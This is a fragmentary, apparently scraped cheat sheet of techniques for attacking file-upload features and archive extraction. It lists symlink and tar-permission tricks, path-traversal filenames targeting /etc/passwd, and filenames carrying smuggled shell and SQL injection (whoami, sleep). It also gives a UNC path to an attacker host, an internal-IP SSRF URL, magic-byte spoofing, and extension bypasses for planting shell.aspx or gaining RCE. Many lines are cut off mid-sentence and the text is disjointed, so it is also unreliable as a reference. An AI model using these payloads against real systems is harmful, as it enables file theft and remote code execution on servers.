tar and zip allow you to include symlinks in the tarballs/archives they generate. If an application does not properly validate the content of the archives, it can lead to arbitrary reading/writing of files.
tar command to extract .tar files, removes symlinks and accesses the subdirectory directly, you can try to bypass the symlink removing process with tar permissions. The Unix tar command preserves the unix permissions assigned to files while creating the archive. If you create a parent directory on which no one has read permissions (chmod 300) while creating the subdirectory with complete permissions (chmod 700), you can include symlinks inside the subdirectory that will not be found during the symlink removing process, but will be found when accessed directly, since the subdirectory has read permissions.
tar, jar, war, cpio, apk, rar and 7z.
filename=/etc/passwd
filename=../../../../../../etc/passwd
filename=\\attacker-website.com\file.png
a$(whoami)z.png, a`whoami`z.png or a';select+sleep(10);--z.png
filename=https://172.17.0.1/internal/file. You can also try to change type="file" to type="url" within a request.
GIF89a to make the server think we are sending it a valid GIF.
.phtml
.jpg.svg or .svg.jpg
%0a, %09, %0d, %00, #, etc. For example, file.png%00.svg or file.png\x0d\x0a.svg
file.
.sVG
.svg
file.%E2%80%AEphp.jpg, see Report: RTL override symbol not stripped from file names
filename="file.png";filename="file.svg"
.aspx, you can upload a file called shell.aspx. (note the trailing dot). Now this filename will bypass the blacklist, as .aspx != .aspx., but upon saving the file to the server, Windows will cut out the trailing ., leaving shell.aspx.
calc.exe inside file.txt:calc.exe copy, you can run the following command:
.htaccess and the ASP.NET/IIS web.config files. You can check your server/framework and try to upload a particular config to bypass some security measures or even execute code.
asp, ashx, asmx, asa, aspx, cer or xamlx extensions to get RCE.
cfm, cfml, cfc or dbm extensions to get RCE.
jsp, jspx, jsw, jsv, or jspf extensions to get RCE.
pl, pm, cgi, or lib extensions to get RCE.